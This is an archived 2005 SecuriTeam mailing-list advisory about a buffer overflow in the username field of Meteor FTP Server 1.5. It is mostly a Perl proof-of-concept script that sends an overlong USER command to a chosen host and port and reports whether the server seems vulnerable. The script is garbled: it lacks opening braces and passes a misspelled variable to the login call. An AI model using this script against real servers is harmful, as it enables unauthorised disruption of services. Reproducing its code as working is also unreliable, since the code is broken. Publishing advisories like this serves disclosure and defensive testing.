From: SecuriTeam <>
To: [email protected]
Date: 29 May 2005 19:06:11 +0200
Subject: [EXPL] Meteor FTP Server Buffer Overflow (username)
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Meteor FTP Server Buffer Overflow (username)
Meteor FTP is "a personal FTP server designed for the Microsoft Windows 98
and Windows Millennium Edition operating systems".
A buffer overflow vulnerability exists in Meteor FTP Server's handling of
the username parameter, the following exploit code can be used to
determine whether your version of Meteor FTP server is vulnerable or not.
Vulnerable Systems:
* Meteor FTP Server version 1.5
# - PoC exploit for Meteor FTP Server
# version 1.5
# bug found by [email protected]
# coded by k0r0l from acolytez team
# visit for details
use Net::FTP;
# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
# ===========
$ftp_error = "Unable";
if (($host) && ($port))
# make exploit string
$exploit_string = "USER ";
$exploit_string .= "X"x80;
#$exploit_string .= "\n\n\n\n"; - it will be new return point !
# ===================
print "Trying to connect to $host:$port\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug =>
$debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Sending string...\n";
$sock->login($exploit_sting, "testpassword");
$answer = $sock->message;
if ($answer =~ m/$ftp_error/i)
print "\n[-] Sorry! Failed\n";
} else
print "\n[+] Send ok!\nServer can be explorated!\n\n";
print "\nMeteor FTP Server - PoC Exploit\n\n\nUsing: $0 host port [debug: 1 or 0]\n\n";
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